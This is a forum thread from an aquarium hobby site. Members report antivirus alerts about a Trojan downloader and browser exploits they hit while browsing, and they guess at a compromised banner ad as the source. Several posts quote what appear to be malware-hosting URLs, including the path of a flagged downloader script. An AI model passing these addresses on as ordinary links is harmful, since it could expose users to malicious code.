AA main page...Trojan?
- Thread starter ccCapt
- Start date
The friendliest place on the web for anyone with an interest in aquariums or fish keeping!
If you have answers, please help by responding to the unanswered posts.
If you have answers, please help by responding to the unanswered posts.
HiJaC
Aquarium Advice Freak
ddcarnage said:
If this works I think there should be an aquarium advice poety competition in honour of our helpful friend.
"An ode to my Dwarf Cichlid" 8)
John
Kurt_Nelson
Aquarium Advice Addict
ddcarnage said:
Just stumbled on this thread...
I can report the same issue regarding the domains noted above. I *think* it's the same issue AA had on their main page several months ago... some bad code in a counter or a compromised banner ad?
My Norton Firewall picked it up, and I'm running Firefox with totally up-to-date Vista32. Just thought I'd pass it on.
Kurt_Nelson
Aquarium Advice Addict
Kurt_Nelson said:
Actually... what I meant to say, but failed to type it (!), was that I had this problem right around the same time "Frank" did. But it was only for a day. I'm not picking up any issues at this time. Because it's an on again, off again thing, that's why I'm thinking it's tied into one of the rotating banners, or a counter - something that isn't hard coded on your server. Someone is hacking into code that's being linked into AA... not AA itself.
Fishyfanatic
Aquarium Advice Addict
I took note yesterday that when it popped up the Aquarium Guys banner was at the top. When I refreshed again to the Aquarium Guys banner it didn't cause the alert.
Kurt_Nelson
Aquarium Advice Addict
I take back my previous comment. NAV firewall blocked it again tonight:
Details: Attempted Intrusion "HTTP WebViewFolderIcon SetSlice BO" against your machine was detected and blocked.
Intruder: s99.msiesettings.com(http(80)).
You might check out this thread...
http://forum.powweb.com/showthread.php?p=426599
Sounds like they got rid of it. (And AA got a plug too!)
Details: Attempted Intrusion "HTTP WebViewFolderIcon SetSlice BO" against your machine was detected and blocked.
Intruder: s99.msiesettings.com(http(80)).
You might check out this thread...
http://forum.powweb.com/showthread.php?p=426599
Sounds like they got rid of it. (And AA got a plug too!)
SparKy697
Aquarium Advice Addict
This seems to be getting worse for me. I can not visit a single page on the aa site without getting a virus detect message. Here is the info on the virus that is being blocked on my machine:
http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=139961
I use IE and have only experienced this on the aa site....
http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=139961
I use IE and have only experienced this on the aa site....
Hoovercat
Aquarium Advice Freak
I've been getting various quarantines here using IE 7 and webroot Spysweeper. Today it quarantined the same virus nomerous times on different forum pages.
JS/CryptDown-A
JS/CryptDown-A
OP
OP
ccCapt
SW 20 & Over Club
I get this now on EVERY page on AA.
Kaspersky Internet Security 6
detected: Trojan program Trojan-Downloader.VBS.Small.do
URL: http://www.gpt-pal.com/scripts/templates/ima///Crypt.DCScript
Kaspersky Internet Security 6
detected: Trojan program Trojan-Downloader.VBS.Small.do
URL: http://www.gpt-pal.com/scripts/templates/ima///Crypt.DCScript
roka64
Aquarium Advice Addict
- Joined
- Mar 21, 2006
- Messages
- 13,858
For the first time yesterday I used IE and it gave me the warning. I just firefox and never have a problem.
Lonewolfblue
Aquarium Advice Addict
I use IE all the time, and never got anything til just now. It acted like it wanted to crash my laptop. My AVG came up with 2 viruses and 1 Trojan, both are still in my AVG Virus Vault. The 2 viruses are as follows:
Exploit
Exploit.CVE-2005-1790
And the Trojan is:
Trojan horse Exploit.CVE-2006-1359
The first virus AVG has it as Healable, but the other 2 are not Healable.
So I just deleted all 3 now.Willsee if it comes up again.
When I got them, my system also told me it was almost out of resources, and said Windows needed to increase page file size, and that some programs might need to be closed for this operation to complete. The only thing I even had open was IE, and only have AVG running in the background.
Exploit
Exploit.CVE-2005-1790
And the Trojan is:
Trojan horse Exploit.CVE-2006-1359
The first virus AVG has it as Healable, but the other 2 are not Healable.
So I just deleted all 3 now.Willsee if it comes up again.
When I got them, my system also told me it was almost out of resources, and said Windows needed to increase page file size, and that some programs might need to be closed for this operation to complete. The only thing I even had open was IE, and only have AVG running in the background.
I'm now upto four different viruses being blocked simultaneously when I first visit the site. This appears to be getting worse. I may have to take a break from AA until the problem is fixed, because this last it brought my laptop to a screeching hault and one of the viruses couldn't be cleaned or quarentined. Luckily it was an older exploit that my system has already been patched to avoid.
Devilishturtles
Aquarium Advice Addict
I never got the warning until just a few days ago too. Now Norton is picking up 3 things whenever I log in to the homepage.
Looks like I'll have to stay off AA for a few weeks until the server is cleaned of Trojans/Viruses.
at home
Win XP SP2 media center edition
IE 6
McAffee finds the trojan
at work
Win XP SP2 professional
IE 6
Trend Micro Professional found trojan one time and now the firewall seems to be blocking further downloads of the trojan on future visits.
at home
Win XP SP2 media center edition
IE 6
McAffee finds the trojan
at work
Win XP SP2 professional
IE 6
Trend Micro Professional found trojan one time and now the firewall seems to be blocking further downloads of the trojan on future visits.
Kurt_Nelson
Aquarium Advice Addict
chase33 said:
The problem is that "they" is probably just one guy! It's not like AA has an IT staff or anything!
This thing is annoying, but I can see where it's hard to track down. Like right now, I've surfed all over the AA site, TRYING to sniff where it's at, and it's not giving me any warnings. It comes and goes. While I have no knowledge of what's being done behind the scenes, it doesn't appear that it's something hard coded/hacked on the AA site - or we'd get the warnings all the time. Most likely, one of the external links/banners has been hacked and it's being pulled in from there. That's probably what's making it tricky to find and fix... the source is not within AA's control.
Just another good lesson on why it's important to use a firewall and/or antivirus scanners.
Devilishturtles
Aquarium Advice Addict
This is what Fishfreek said a few posts back:
Please be patient.
Please be patient.
Fishyfanatic
Aquarium Advice Addict
Kurt is correct. We do not have an IT Department. The admins are trying to take care of the problem but as Lindsay pointed out, FF is aware of the problem and is trying to fix it. I don't know if it's a banner problem or not. I get the error message from the first page I open a post directly from an e-mail notification. If I have 40 AA e-mails the Trojan will only appear on the first e-mail that I click from. It doesn't matter what banner is at the top of the page or who has responded to the post.
Kurt_Nelson
Aquarium Advice Addict
Fishyfanatic said:
Actually... depending on what type of firewall you're running, the offending script might be associated with all the emails - or actually the AA page you're linking to -, but you're just seeing the warning on the first one. With me, my firewall detects the script and then blocks the IP address that script is being called from for 30 minutes. That 30 minute "time out" would give the appearance that the first email was the bad one, but all the rest were OK. In reality, they're probably all bad, but because of the 30 minute block on that IP, you're not seeing it anymore.
Hope that makes sense...
Similar threads
